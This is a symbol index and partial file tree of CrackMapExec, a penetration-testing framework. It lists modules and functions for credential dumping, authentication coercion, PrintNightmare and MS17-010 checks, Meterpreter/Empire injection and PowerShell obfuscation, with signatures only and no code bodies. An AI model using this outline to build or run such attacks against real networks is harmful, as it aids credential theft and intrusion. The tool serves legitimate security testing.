│ │ │ └── proto_args.py
│ │ ├── winrm.py
│ │ ├── wmi/
│ │ │ ├── __init__.py
│ │ │ ├── database.py
│ │ │ ├── db_navigator.py
│ │ │ ├── proto_args.py
│ │ │ ├── wmiexec.py
│ │ │ └── wmiexec_event.py
│ │ └── wmi.py
│ └── servers/
│ ├── __init__.py
│ ├── http.py
│ └── smb.py
├── crackmapexec.spec
├── flake.nix
├── pyproject.toml
├── shell.nix
└── tests/
├── README.md
├── data/
│ ├── test_key.priv
│ ├── test_passwords.txt
│ └── test_users.txt
├── e2e_commands.txt
├── e2e_test.py
└── test_smb_database.py
SYMBOL INDEX (1220 symbols across 146 files)
FILE: build_collector.py
function build_cme (line 19) | def build_cme():
function build_cmedb (line 72) | def build_cmedb():
FILE: cme/cli.py
function gen_cli_args (line 14) | def gen_cli_args():
FILE: cme/cmedb.py
class UserExitedProto (line 24) | class UserExitedProto(Exception):
function create_db_engine (line 28) | def create_db_engine(db_path):
function print_table (line 33) | def print_table(data, title=None):
function write_csv (line 42) | def write_csv(filename, headers, entries):
function write_list (line 59) | def write_list(filename, entries):
function complete_import (line 69) | def complete_import(text, line):
function complete_export (line 79) | def complete_export(text, line):
function print_help (line 97) | def print_help(help_string):
class DatabaseNavigator (line 101) | class DatabaseNavigator(cmd.Cmd):
method __init__ (line 102) | def __init__(self, main_menu, database, proto):
method do_exit (line 110) | def do_exit(self, line):
method help_exit (line 115) | def help_exit():
method do_back (line 121) | def do_back(self, line):
method do_export (line 124) | def do_export(self, line):
method help_export (line 413) | def help_export():
method do_import (line 425) | def do_import(self, line):
class CMEDBMenu (line 473) | class CMEDBMenu(cmd.Cmd):
method __init__ (line 474) | def __init__(self, config_path):
method write_configfile (line 496) | def write_configfile(self):
method do_proto (line 500) | def do_proto(self, proto):
method help_proto (line 518) | def help_proto():
method do_workspace (line 526) | def do_workspace(self, line):
method help_workspace (line 553) | def help_workspace():
method do_exit (line 560) | def do_exit(line):
method help_exit (line 564) | def help_exit():
method create_workspace (line 571) | def create_workspace(workspace_name, p_loader, protocols):
function delete_workspace (line 594) | def delete_workspace(workspace_name):
function initialize_db (line 598) | def initialize_db(logger):
function main (line 624) | def main():
FILE: cme/config.py
function process_secret (line 46) | def process_secret(text):
FILE: cme/connection.py
function gethost_addrinfo (line 26) | def gethost_addrinfo(hostname):
function requires_admin (line 37) | def requires_admin(func):
function dcom_FirewallChecker (line 45) | def dcom_FirewallChecker(iInterface, timeout):
class connection (line 73) | class connection(object):
method __init__ (line 74) | def __init__(self, args, db, host):
method proto_args (line 118) | def proto_args(std_parser, module_parser):
method proto_logger (line 121) | def proto_logger(self):
method enum_host_info (line 124) | def enum_host_info(self):
method print_host_info (line 127) | def print_host_info(self):
method create_conn_obj (line 130) | def create_conn_obj(self):
method check_if_admin (line 133) | def check_if_admin(self):
method kerberos_login (line 136) | def kerberos_login(
method plaintext_login (line 148) | def plaintext_login(self, domain, username, password):
method hash_login (line 151) | def hash_login(self, domain, username, ntlm_hash):
method proto_flow (line 154) | def proto_flow(self):
method call_cmd_args (line 167) | def call_cmd_args(self):
method call_modules (line 174) | def call_modules(self):
method inc_failed_login (line 207) | def inc_failed_login(self, username):
method over_fail_limit (line 218) | def over_fail_limit(self, username):
method query_db_creds (line 234) | def query_db_creds(self):
method parse_credentials (line 272) | def parse_credentials(self):
method try_credentials (line 346) | def try_credentials(self, domain, username, owned, secret, cred_type, ...
method login (line 380) | def login(self):
method mark_pwned (line 438) | def mark_pwned(self):
FILE: cme/context.py
class Context (line 8) | class Context:
method __init__ (line 9) | def __init__(self, db, logger, args):
FILE: cme/crackmapexec.py
function create_db_engine (line 50) | def create_db_engine(db_path):
function start_run (line 55) | async def start_run(protocol_obj, args, db, targets):
function main (line 77) | def main():
FILE: cme/first_run.py
function first_run_setup (line 13) | def first_run_setup(logger=cme_logger):
FILE: cme/helpers/bash.py
function get_script (line 7) | def get_script(path):
FILE: cme/helpers/bloodhound.py
function add_user_bh (line 5) | def add_user_bh(user, domain, logger, config):
FILE: cme/helpers/http.py
function get_desktop_uagent (line 7) | def get_desktop_uagent(uagent=None):
FILE: cme/helpers/logger.py
function write_log (line 8) | def write_log(data, log_name):
function highlight (line 14) | def highlight(text, color="yellow"):
FILE: cme/helpers/misc.py
function identify_target_file (line 11) | def identify_target_file(target_file):
function gen_random_string (line 23) | def gen_random_string(length=10):
function validate_ntlm (line 27) | def validate_ntlm(data):
function called_from_cmd_args (line 35) | def called_from_cmd_args():
function which (line 47) | def which(cmd, mode=os.F_OK | os.X_OK, path=None):
FILE: cme/helpers/powershell.py
function get_ps_script (line 17) | def get_ps_script(path):
function encode_ps_command (line 21) | def encode_ps_command(command):
function is_powershell_installed (line 25) | def is_powershell_installed():
function obfs_ps_script (line 31) | def obfs_ps_script(path_to_script):
function create_ps_command (line 69) | def create_ps_command(ps_command, force_ps32=False, dont_obfs=False, cus...
function gen_ps_inject (line 168) | def gen_ps_inject(command, context=None, procname="explorer.exe", inject...
function gen_ps_iex_cradle (line 210) | def gen_ps_iex_cradle(context, scripts, command=str(), post_back=True):
function invoke_obfuscation (line 262) | def invoke_obfuscation(script_string):
FILE: cme/loaders/moduleloader.py
class ModuleLoader (line 18) | class ModuleLoader:
method __init__ (line 19) | def __init__(self, args, db, logger):
method module_is_sane (line 24) | def module_is_sane(self, module, module_path):
method load_module (line 58) | def load_module(self, module_path):
method init_module (line 73) | def init_module(self, module_path):
method get_module_info (line 101) | def get_module_info(self, module_path):
method list_modules (line 126) | def list_modules(self):
FILE: cme/loaders/protocolloader.py
class ProtocolLoader (line 11) | class ProtocolLoader:
method __init__ (line 12) | def __init__(self):
method load_protocol (line 15) | def load_protocol(self, protocol_path):
method get_protocols (line 21) | def get_protocols(self):
FILE: cme/logger.py
class CMEAdapter (line 17) | class CMEAdapter(logging.LoggerAdapter):
method __init__ (line 18) | def __init__(self, extra=None):
method format (line 39) | def format(self, msg, *args, **kwargs):
method display (line 76) | def display(self, msg, *args, **kwargs):
method success (line 91) | def success(self, msg, color='green', *args, **kwargs):
method highlight (line 106) | def highlight(self, msg, *args, **kwargs):
method fail (line 121) | def fail(self, msg, color='red', *args, **kwargs):
method log_console_to_file (line 135) | def log_console_to_file(self, text, *args, **kwargs):
method add_file_log (line 161) | def add_file_log(self, log_file=None):
method init_log_file (line 183) | def init_log_file():
class TermEscapeCodeFormatter (line 196) | class TermEscapeCodeFormatter(logging.Formatter):
method __init__ (line 199) | def __init__(self, fmt=None, datefmt=None, style="%", validate=True):
method format (line 202) | def format(self, record):
FILE: cme/modules/IOXIDResolver.py
class CMEModule (line 14) | class CMEModule:
method options (line 21) | def options(self, context, module_options):
method on_login (line 24) | def on_login(self, context, connection):
FILE: cme/modules/MachineAccountQuota.py
class CMEModule (line 5) | class CMEModule:
method options (line 17) | def options(self, context, module_options):
method on_login (line 26) | def on_login(self, context, connection):
FILE: cme/modules/adcs.py
class CMEModule (line 8) | class CMEModule:
method __init__ (line 21) | def __init__(self, context=None, module_options=None):
method options (line 27) | def options(self, context, module_options):
method on_login (line 42) | def on_login(self, context, connection):
method process_servers (line 79) | def process_servers(self, item):
method process_templates (line 115) | def process_templates(self, item):
FILE: cme/modules/add_computer.py
class CMEModule (line 8) | class CMEModule:
method options (line 22) | def options(self, context, module_options):
method on_login (line 63) | def on_login(self, context, connection):
method doSAMRAdd (line 97) | def doSAMRAdd(self,context):
method doLDAPSAdd (line 262) | def doLDAPSAdd(self, connection, context):
FILE: cme/modules/appcmd.py
class CMEModule (line 3) | class CMEModule:
method __init__ (line 17) | def __init__(self):
method options (line 20) | def options(self, context, module_options):
method on_admin_login (line 23) | def on_admin_login(self, context, connection):
method check_appcmd (line 26) | def check_appcmd(self, context, connection):
method execute_appcmd (line 45) | def execute_appcmd(self, context, connection):
FILE: cme/modules/bh_owned.py
class CMEModule (line 14) | class CMEModule:
method __init__ (line 21) | def __init__(self, context=None, module_options=None):
method options (line 29) | def options(self, context, module_options):
method on_admin_login (line 51) | def on_admin_login(self, context, connection):
FILE: cme/modules/daclread.py
class RIGHTS_GUID (line 100) | class RIGHTS_GUID(Enum):
class ACE_FLAGS (line 110) | class ACE_FLAGS(Enum):
class OBJECT_ACE_FLAGS (line 124) | class OBJECT_ACE_FLAGS(Enum):
class ACCESS_MASK (line 133) | class ACCESS_MASK(Enum):
class SIMPLE_PERMISSIONS (line 168) | class SIMPLE_PERMISSIONS(Enum):
class ALLOWED_OBJECT_ACE_MASK_FLAGS (line 181) | class ALLOWED_OBJECT_ACE_MASK_FLAGS(Enum):
class CMEModule (line 190) | class CMEModule:
method __init__ (line 204) | def __init__(self, context=None, module_options=None):
method options (line 208) | def options(self, context, module_options):
method on_login (line 266) | def on_login(self, context, connection):
method read (line 339) | def read(self, context):
method backup (line 346) | def backup(self, context):
method search_target_principal_security_descriptor (line 361) | def search_target_principal_security_descriptor(self, context, connect...
method get_user_info (line 390) | def get_user_info(self, context, samname):
method resolveSID (line 406) | def resolveSID(self, context, sid):
method parse_dacl (line 436) | def parse_dacl(self, context, dacl):
method parse_perms (line 449) | def parse_perms(self, fsr):
method parse_ace (line 462) | def parse_ace(self, context, ace):
method print_parsed_dacl (line 549) | def print_parsed_dacl(self, context, parsed_dacl):
method print_parsed_ace (line 607) | def print_parsed_ace(self, parsed_ace):
method build_guids_for_rights (line 613) | def build_guids_for_rights(self):
FILE: cme/modules/dfscoerce.py
class CMEModule (line 13) | class CMEModule:
method __init__ (line 20) | def __init__(self, context=None, module_options=None):
method options (line 25) | def options(self, context, module_options):
method on_login (line 33) | def on_login(self, context, connection):
class DCERPCSessionError (line 58) | class DCERPCSessionError(DCERPCException):
method __init__ (line 59) | def __init__(self, error_string=None, error_code=None, packet=None):
method __str__ (line 62) | def __str__(self):
class NetrDfsRemoveStdRoot (line 79) | class NetrDfsRemoveStdRoot(NDRCALL):
class NetrDfsRemoveStdRootResponse (line 88) | class NetrDfsRemoveStdRootResponse(NDRCALL):
class NetrDfsAddRoot (line 92) | class NetrDfsAddRoot(NDRCALL):
class NetrDfsAddRootResponse (line 102) | class NetrDfsAddRootResponse(NDRCALL):
class TriggerAuth (line 106) | class TriggerAuth:
method connect (line 107) | def connect(self, username, password, domain, lmhash, nthash, aesKey, ...
method NetrDfsRemoveStdRoot (line 140) | def NetrDfsRemoveStdRoot(self, dce, listener):
FILE: cme/modules/drop-sc.py
class CMEModule (line 7) | class CMEModule:
method options (line 20) | def options(self, context, module_options):
method on_login (line 66) | def on_login(self, context, connection):
FILE: cme/modules/empire_exec.py
class CMEModule (line 14) | class CMEModule:
method options (line 26) | def options(self, context, module_options):
method on_admin_login (line 135) | def on_admin_login(self, context, connection):
FILE: cme/modules/enum_av.py
class CMEModule (line 13) | class CMEModule:
method __init__ (line 25) | def __init__(self, context=None, module_options=None):
method options (line 29) | def options(self, context, module_options):
method on_login (line 33) | def on_login(self, context, connection):
method dump_results (line 87) | def dump_results(self, results, remoteName, success, context):
class LsaLookupNames (line 108) | class LsaLookupNames:
method __init__ (line 118) | def __init__(
method connect (line 141) | def connect(self, string_binding=None, iface_uuid=None):
method open_policy (line 184) | def open_policy(self, dce):
method LsarLookupNames (line 195) | def LsarLookupNames(self, dce, policyHandle, service):
FILE: cme/modules/enum_dns.py
class CMEModule (line 8) | class CMEModule:
method __init__ (line 20) | def __init__(self, context=None, module_options=None):
method options (line 25) | def options(self, context, module_options):
method on_admin_login (line 33) | def on_admin_login(self, context, connection):
FILE: cme/modules/example_module.py
class CMEModule (line 5) | class CMEModule:
method __init__ (line 17) | def __init__(self, context=None, module_options=None):
method options (line 21) | def options(self, context, module_options):
method on_login (line 27) | def on_login(self, context, connection):
method on_admin_login (line 49) | def on_admin_login(self, context, connection):
method on_request (line 56) | def on_request(self, context, request):
method on_response (line 62) | def on_response(self, context, response):
method on_shutdown (line 68) | def on_shutdown(self, context, connection):
FILE: cme/modules/find-computer.py
class CMEModule (line 6) | class CMEModule:
method options (line 20) | def options(self, context, module_options):
method on_login (line 36) | def on_login(self, context, connection):
FILE: cme/modules/firefox.py
class CMEModule (line 6) | class CMEModule:
method options (line 19) | def options(self, context, module_options):
method on_admin_login (line 23) | def on_admin_login(self, context, connection):
FILE: cme/modules/get-desc-users.py
class CMEModule (line 10) | class CMEModule:
method options (line 22) | def options(self, context, module_options):
method on_login (line 39) | def on_login(self, context, connection):
method filter_answer (line 87) | def filter_answer(self, context, answers):
FILE: cme/modules/get_netconnections.py
class CMEModule (line 9) | class CMEModule:
method options (line 22) | def options(self, context, module_options):
method on_admin_login (line 28) | def on_admin_login(self, context, connection):
FILE: cme/modules/gpp_autologin.py
class CMEModule (line 8) | class CMEModule:
method options (line 20) | def options(self, context, module_options):
method on_login (line 23) | def on_login(self, context, connection):
FILE: cme/modules/gpp_password.py
class CMEModule (line 11) | class CMEModule:
method options (line 23) | def options(self, context, module_options):
method on_login (line 26) | def on_login(self, context, connection):
method decrypt_cpassword (line 106) | def decrypt_cpassword(self, cpassword):
FILE: cme/modules/group_members.py
class CMEModule (line 6) | class CMEModule:
method options (line 22) | def options(self, context, module_options):
method on_login (line 38) | def on_login(self, context, connection):
function doSearch (line 70) | def doSearch(self,context, connection,searchFilter,attributeName):
FILE: cme/modules/groupmembership.py
class CMEModule (line 8) | class CMEModule:
method options (line 23) | def options(self, context, module_options):
method on_login (line 38) | def on_login(self, context, connection):
FILE: cme/modules/handlekatz.py
class CMEModule (line 15) | class CMEModule:
method options (line 22) | def options(self, context, module_options):
method on_admin_login (line 54) | def on_admin_login(self, context, connection):
FILE: cme/modules/hash_spider.py
function neo4j_conn (line 20) | def neo4j_conn(context, connection, driver):
function neo4j_local_admins (line 39) | def neo4j_local_admins(context, driver):
function create_db (line 51) | def create_db(local_admins, dbconnection, cursor):
function process_creds (line 76) | def process_creds(context, connection, credentials_data, dbconnection, c...
function initial_run (line 123) | def initial_run(connection, cursor):
class CMEModule (line 137) | class CMEModule:
method __init__ (line 144) | def __init__(self, context=None, module_options=None):
method save_credentials (line 151) | def save_credentials(context, connection, domain, username, password, ...
method options (line 159) | def options(self, context, module_options):
method run_lsassy (line 171) | def run_lsassy(self, context, connection, cursor): # copied and paste...
method spider_pcs (line 237) | def spider_pcs(self, context, connection, cursor, dbconnection, driver):
method on_admin_login (line 273) | def on_admin_login(self, context, connection):
FILE: cme/modules/impersonate.py
class CMEModule (line 10) | class CMEModule:
method options (line 18) | def options(self, context, module_options):
method list_available_primary_tokens (line 42) | def list_available_primary_tokens(self, _, connection):
method on_admin_login (line 46) | def on_admin_login(self, context, connection):
FILE: cme/modules/install_elevated.py
class CMEModule (line 9) | class CMEModule:
method options (line 16) | def options(self, context, module_options):
method on_admin_login (line 19) | def on_admin_login(self, context, connection):
FILE: cme/modules/keepass_discover.py
class CMEModule (line 4) | class CMEModule:
method __init__ (line 18) | def __init__(self):
method options (line 22) | def options(self, context, module_options):
method on_admin_login (line 39) | def on_admin_login(self, context, connection):
FILE: cme/modules/keepass_trigger.py
class CMEModule (line 13) | class CMEModule:
method __init__ (line 31) | def __init__(self):
method options (line 58) | def options(self, context, module_options):
method on_admin_login (line 127) | def on_admin_login(self, context, connection):
method add_trigger (line 142) | def add_trigger(self, context, connection):
method check_trigger_added (line 179) | def check_trigger_added(self, context, connection):
method restart (line 187) | def restart(self, context, connection):
method poll (line 246) | def poll(self, context, connection):
method clean (line 292) | def clean(self, context, connection):
method all_in_one (line 339) | def all_in_one(self, context, connection):
method trigger_added (line 354) | def trigger_added(self, context, connection):
method put_file_execute_delete (line 381) | def put_file_execute_delete(self, context, connection, psh_script_str):
method extract_password (line 390) | def extract_password(self, context):
FILE: cme/modules/laps.py
class CMEModule (line 8) | class CMEModule:
method options (line 24) | def options(self, context, module_options):
method on_login (line 33) | def on_login(self, context, connection):
FILE: cme/modules/ldap-checker.py
class CMEModule (line 16) | class CMEModule:
method options (line 30) | def options(self, context, module_options):
method on_login (line 36) | def on_login(self, context, connection):
FILE: cme/modules/lsassy_dump.py
class CMEModule (line 17) | class CMEModule:
method __init__ (line 24) | def __init__(self, context=None, module_options=None):
method options (line 29) | def options(self, context, module_options):
method on_admin_login (line 37) | def on_admin_login(self, context, connection):
method process_credentials (line 125) | def process_credentials(self, context, connection, credentials):
method print_credentials (line 157) | def print_credentials(context, domain, username, password, lmhash, nth...
method save_credentials (line 164) | def save_credentials(context, connection, domain, username, password, ...
FILE: cme/modules/masky.py
class CMEModule (line 8) | class CMEModule:
method options (line 15) | def options(self, context, module_options):
method on_admin_login (line 41) | def on_admin_login(self, context, connection):
method process_results (line 75) | def process_results(self, connection, context, rslts, tracker):
method process_credentials (line 98) | def process_credentials(self, connection, context, user):
method process_errors (line 109) | def process_errors(self, context, tracker):
FILE: cme/modules/met_inject.py
class CMEModule (line 7) | class CMEModule:
method __init__ (line 19) | def __init__(self, context=None, module_options=None):
method options (line 27) | def options(self, context, module_options):
method on_admin_login (line 59) | def on_admin_login(self, context, connection):
FILE: cme/modules/ms17-010.py
class CMEModule (line 12) | class CMEModule:
method options (line 19) | def options(self, context, module_options):
method on_login (line 22) | def on_login(self, context, connection):
class SMB_HEADER (line 28) | class SMB_HEADER(Structure):
method __new__ (line 50) | def __new__(self, buffer=None):
function generate_smb_proto_payload (line 54) | def generate_smb_proto_payload(*protos):
function calculate_doublepulsar_xor_key (line 62) | def calculate_doublepulsar_xor_key(s):
function negotiate_proto_request (line 69) | def negotiate_proto_request():
function session_setup_andx_request (line 104) | def session_setup_andx_request():
function tree_connect_andx_request (line 146) | def tree_connect_andx_request(ip, userid):
function peeknamedpipe_request (line 188) | def peeknamedpipe_request(treeid, processid, userid, multiplex_id):
function trans2_request (line 234) | def trans2_request(treeid, processid, userid, multiplex_id):
function check (line 279) | def check(ip, port=445):
FILE: cme/modules/msol.py
class CMEModule (line 9) | class CMEModule:
method __init__ (line 16) | def __init__(self, context=None, module_options=None):
method options (line 29) | def options(self, context, module_options):
method exec_script (line 47) | def exec_script(self, _, connection):
method on_admin_login (line 51) | def on_admin_login(self, context, connection):
FILE: cme/modules/mssql_priv.py
class User (line 10) | class User:
method __init__ (line 11) | def __init__(self, username):
method __str__ (line 20) | def __str__(self):
class CMEModule (line 24) | class CMEModule:
method __init__ (line 35) | def __init__(self):
method options (line 43) | def options(self, context, module_options):
method on_login (line 56) | def on_login(self, context, connection):
method build_exec_as_from_path (line 97) | def build_exec_as_from_path(self, target_user):
method browse_path (line 107) | def browse_path(self, context, initial_user: User, user: User) -> User:
method query_and_get_output (line 125) | def query_and_get_output(self, query):
method sql_exec_as (line 135) | def sql_exec_as(self, grantors: list) -> str:
method perform_impersonation_check (line 141) | def perform_impersonation_check(self, user: User, grantors=[]):
method update_priv (line 162) | def update_priv(self, user: User, exec_as=""):
method get_current_username (line 169) | def get_current_username(self) -> str:
method is_admin (line 172) | def is_admin(self, exec_as="") -> bool:
method get_databases (line 184) | def get_databases(self, exec_as="") -> list:
method is_dbowner (line 192) | def is_dbowner(self, database, exec_as="") -> bool:
method find_dbowner_priv (line 211) | def find_dbowner_priv(self, databases, exec_as="") -> list:
method find_trusted_db (line 218) | def find_trusted_db(self, exec_as="") -> list:
method check_dbowner_privesc (line 233) | def check_dbowner_privesc(self, exec_as=""):
method do_dbowner_privesc (line 243) | def do_dbowner_privesc(self, database, exec_as=""):
method do_impersonation_privesc (line 259) | def do_impersonation_privesc(self, username, exec_as=""):
method get_impersonate_users (line 266) | def get_impersonate_users(self, exec_as="") -> list:
method remove_sysadmin_priv (line 278) | def remove_sysadmin_priv(self) -> bool:
method is_admin_user (line 282) | def is_admin_user(self, username) -> bool:
method revert_context (line 293) | def revert_context(self, exec_as):
FILE: cme/modules/nanodump.py
class CMEModule (line 16) | class CMEModule:
method __init__ (line 23) | def __init__(self, context=None, module_options=None):
method options (line 36) | def options(self, context, module_options):
method on_admin_login (line 83) | def on_admin_login(self, context, connection):
method delete_nanodump_binary (line 267) | def delete_nanodump_binary(self):
FILE: cme/modules/nopac.py
class CMEModule (line 13) | class CMEModule:
method options (line 20) | def options(self, context, module_options):
method on_login (line 23) | def on_login(self, context, connection):
FILE: cme/modules/ntdsutil.py
class CMEModule (line 12) | class CMEModule:
method options (line 25) | def options(self, context, module_options):
method on_admin_login (line 43) | def on_admin_login(self, context, connection):
FILE: cme/modules/ntlmv1.py
class CMEModule (line 9) | class CMEModule:
method options (line 21) | def options(self, context, module_options):
method on_admin_login (line 24) | def on_admin_login(self, context, connection):
FILE: cme/modules/petitpotam.py
class CMEModule (line 22) | class CMEModule:
method options (line 29) | def options(self, context, module_options):
method on_login (line 41) | def on_login(self, context, connection):
class DCERPCSessionError (line 74) | class DCERPCSessionError(DCERPCException):
method __init__ (line 75) | def __init__(self, error_string=None, error_code=None, packet=None):
method __str__ (line 78) | def __str__(self):
class EXIMPORT_CONTEXT_HANDLE (line 95) | class EXIMPORT_CONTEXT_HANDLE(NDRSTRUCT):
class EFS_EXIM_PIPE (line 100) | class EFS_EXIM_PIPE(NDRSTRUCT):
class EFS_HASH_BLOB (line 105) | class EFS_HASH_BLOB(NDRSTRUCT):
class EFS_RPC_BLOB (line 112) | class EFS_RPC_BLOB(NDRSTRUCT):
class EFS_CERTIFICATE_BLOB (line 119) | class EFS_CERTIFICATE_BLOB(NDRSTRUCT):
class ENCRYPTION_CERTIFICATE_HASH (line 127) | class ENCRYPTION_CERTIFICATE_HASH(NDRSTRUCT):
class ENCRYPTION_CERTIFICATE (line 136) | class ENCRYPTION_CERTIFICATE(NDRSTRUCT):
class ENCRYPTION_CERTIFICATE_HASH_LIST (line 144) | class ENCRYPTION_CERTIFICATE_HASH_LIST(NDRSTRUCT):
class ENCRYPTED_FILE_METADATA_SIGNATURE (line 152) | class ENCRYPTED_FILE_METADATA_SIGNATURE(NDRSTRUCT):
class ENCRYPTION_CERTIFICATE_LIST (line 161) | class ENCRYPTION_CERTIFICATE_LIST(NDRSTRUCT):
class EfsRpcOpenFileRaw (line 169) | class EfsRpcOpenFileRaw(NDRCALL):
class EfsRpcOpenFileRawResponse (line 177) | class EfsRpcOpenFileRawResponse(NDRCALL):
class EfsRpcEncryptFileSrv (line 184) | class EfsRpcEncryptFileSrv(NDRCALL):
class EfsRpcEncryptFileSrvResponse (line 189) | class EfsRpcEncryptFileSrvResponse(NDRCALL):
function coerce (line 193) | def coerce(
function efs_rpc_open_file_raw (line 268) | def efs_rpc_open_file_raw(dce, listener, context=None):
FILE: cme/modules/pi.py
class CMEModule (line 5) | class CMEModule:
method options (line 13) | def options(self, context, module_options):
method on_admin_login (line 35) | def on_admin_login(self, context, connection):
FILE: cme/modules/printnightmare.py
class CMEModule (line 19) | class CMEModule:
method __init__ (line 31) | def __init__(self, context=None, module_options=None):
method options (line 37) | def options(self, context, module_options):
method on_login (line 45) | def on_login(self, context, connection):
class DCERPCSessionError (line 113) | class DCERPCSessionError(DCERPCException):
method __init__ (line 114) | def __init__(self, error_string=None, error_code=None, packet=None):
method __str__ (line 117) | def __str__(self):
class DRIVER_INFO_1 (line 154) | class DRIVER_INFO_1(NDRSTRUCT):
class PDRIVER_INFO_1 (line 158) | class PDRIVER_INFO_1(NDRPOINTER):
class DRIVER_INFO_2 (line 163) | class DRIVER_INFO_2(NDRSTRUCT):
class PDRIVER_INFO_2 (line 174) | class PDRIVER_INFO_2(NDRPOINTER):
class DRIVER_INFO_2_BLOB (line 178) | class DRIVER_INFO_2_BLOB(Structure):
method __init__ (line 188) | def __init__(self, data=None):
method fromString (line 191) | def fromString(self, data, offset=0):
class DRIVER_INFO_2_ARRAY (line 204) | class DRIVER_INFO_2_ARRAY(Structure):
method __init__ (line 205) | def __init__(self, data=None, pcReturned=None):
class DRIVER_INFO_UNION (line 216) | class DRIVER_INFO_UNION(NDRUNION):
class DRIVER_CONTAINER (line 222) | class DRIVER_CONTAINER(NDRSTRUCT):
class RpcEnumPrinterDrivers (line 230) | class RpcEnumPrinterDrivers(NDRCALL):
class RpcEnumPrinterDriversResponse (line 241) | class RpcEnumPrinterDriversResponse(NDRCALL):
class RpcAddPrinterDriverEx (line 251) | class RpcAddPrinterDriverEx(NDRCALL):
class RpcAddPrinterDriverExResponse (line 260) | class RpcAddPrinterDriverExResponse(NDRCALL):
class RpcDeletePrinterDriverEx (line 265) | class RpcDeletePrinterDriverEx(NDRCALL):
class RpcDeletePrinterDriverExResponse (line 276) | class RpcDeletePrinterDriverExResponse(NDRCALL):
function hRpcAddPrinterDriverEx (line 293) | def hRpcAddPrinterDriverEx(dce, pName, pDriverContainer, dwFileCopyFlags):
FILE: cme/modules/procdump.py
class CMEModule (line 17) | class CMEModule:
method options (line 24) | def options(self, context, module_options):
method on_admin_login (line 57) | def on_admin_login(self, context, connection):
FILE: cme/modules/pso.py
class CMEModule (line 10) | class CMEModule:
method options (line 38) | def options(self, context, module_options):
method convert_time_field (line 44) | def convert_time_field(self, field, value):
method on_login (line 57) | def on_login(self, context, connection):
FILE: cme/modules/rdcman.py
class CMEModule (line 13) | class CMEModule:
method options (line 20) | def options(self, context, module_options):
method on_admin_login (line 35) | def on_admin_login(self, context, connection):
FILE: cme/modules/rdp.py
class CMEModule (line 16) | class CMEModule:
method __init__ (line 23) | def __init__(self, context=None, module_options=None):
method options (line 28) | def options(self, context, module_options):
method on_admin_login (line 71) | def on_admin_login(self, context, connection):
class rdp_SMB (line 110) | class rdp_SMB:
method __init__ (line 111) | def __init__(self, context, connection):
method rdp_Wrapper (line 117) | def rdp_Wrapper(self, action):
method rdp_RAMWrapper (line 156) | def rdp_RAMWrapper(self, action):
method query_RDPPort (line 191) | def query_RDPPort(self, remoteOps, regHandle):
method firewall_CMD (line 205) | def firewall_CMD(self, action):
class rdp_WMI (line 214) | class rdp_WMI:
method __init__ (line 215) | def __init__(self, context, connection, timeout):
method rdp_Wrapper (line 262) | def rdp_Wrapper(self, action, old=False):
method query_RDPResult (line 295) | def query_RDPResult(self, old=False):
method query_RDPPort (line 320) | def query_RDPPort(self):
method rdp_RAMWrapper (line 328) | def rdp_RAMWrapper(self, action):
FILE: cme/modules/reg-query.py
class CMEModule (line 9) | class CMEModule:
method __init__ (line 16) | def __init__(self, context=None, module_options=None):
method options (line 25) | def options(self, context, module_options):
method on_admin_login (line 80) | def on_admin_login(self, context, connection):
FILE: cme/modules/runasppl.py
class CMEModule (line 5) | class CMEModule:
method __init__ (line 12) | def __init__(self, context=None, module_options=None):
method options (line 16) | def options(self, context, module_options):
method on_admin_login (line 19) | def on_admin_login(self, context, connection):
FILE: cme/modules/scan-network.py
function get_dns_zones (line 18) | def get_dns_zones(connection, root, debug=False):
function get_dns_resolver (line 28) | def get_dns_resolver(server, context):
function ldap2domain (line 45) | def ldap2domain(ldap):
function new_record (line 49) | def new_record(rtype, serial):
function searchResEntry_to_dict (line 74) | def searchResEntry_to_dict(results):
class CMEModule (line 83) | class CMEModule:
method options (line 90) | def options(self, context, module_options):
method on_login (line 116) | def on_login(self, context, connection):
class DNS_RECORD (line 200) | class DNS_RECORD(Structure):
class DNS_RPC_NAME (line 229) | class DNS_RPC_NAME(Structure):
class DNS_COUNT_NAME (line 240) | class DNS_COUNT_NAME(Structure):
method toFqdn (line 250) | def toFqdn(self):
class DNS_RPC_NODE (line 262) | class DNS_RPC_NODE(Structure):
class DNS_RPC_RECORD_A (line 277) | class DNS_RPC_RECORD_A(Structure):
method formatCanonical (line 285) | def formatCanonical(self):
method fromCanonical (line 288) | def fromCanonical(self, canonical):
class DNS_RPC_RECORD_NODE_NAME (line 292) | class DNS_RPC_RECORD_NODE_NAME(Structure):
class DNS_RPC_RECORD_SOA (line 301) | class DNS_RPC_RECORD_SOA(Structure):
class DNS_RPC_RECORD_NULL (line 318) | class DNS_RPC_RECORD_NULL(Structure):
class DNS_RPC_RECORD_NAME_PREFERENCE (line 330) | class DNS_RPC_RECORD_NAME_PREFERENCE(Structure):
class DNS_RPC_RECORD_AAAA (line 342) | class DNS_RPC_RECORD_AAAA(Structure):
method formatCanonical (line 350) | def formatCanonical(self):
class DNS_RPC_RECORD_SRV (line 354) | class DNS_RPC_RECORD_SRV(Structure):
class DNS_RPC_RECORD_TS (line 368) | class DNS_RPC_RECORD_TS(Structure):
method toDatetime (line 376) | def toDatetime(self):
FILE: cme/modules/scuffy.py
class CMEModule (line 8) | class CMEModule:
method __init__ (line 21) | def __init__(self, context=None, module_options=None):
method options (line 30) | def options(self, context, module_options):
method on_login (line 61) | def on_login(self, context, connection):
FILE: cme/modules/shadowcoerce.py
class CMEModule (line 20) | class CMEModule:
method options (line 27) | def options(self, context, module_options):
method on_login (line 40) | def on_login(self, context, connection):
class DCERPCSessionError (line 93) | class DCERPCSessionError(DCERPCException):
method __init__ (line 94) | def __init__(self, error_string=None, error_code=None, packet=None):
method __str__ (line 97) | def __str__(self):
class IsPathSupported (line 161) | class IsPathSupported(NDRCALL):
class IsPathSupportedResponse (line 166) | class IsPathSupportedResponse(NDRCALL):
class IsPathShadowCopied (line 173) | class IsPathShadowCopied(NDRCALL):
class IsPathShadowCopiedResponse (line 178) | class IsPathShadowCopiedResponse(NDRCALL):
class CoerceAuth (line 191) | class CoerceAuth:
method connect (line 192) | def connect(
method IsPathShadowCopied (line 254) | def IsPathShadowCopied(self, dce, listener):
method IsPathSupported (line 270) | def IsPathSupported(self, dce, listener):
FILE: cme/modules/slinky.py
class CMEModule (line 9) | class CMEModule:
method __init__ (line 21) | def __init__(self, context=None, module_options=None):
method options (line 30) | def options(self, context, module_options):
method on_login (line 60) | def on_login(self, context, connection):
FILE: cme/modules/spider_plus.py
function human_size (line 17) | def human_size(nbytes):
function human_time (line 37) | def human_time(timestamp):
function make_dirs (line 44) | def make_dirs(path):
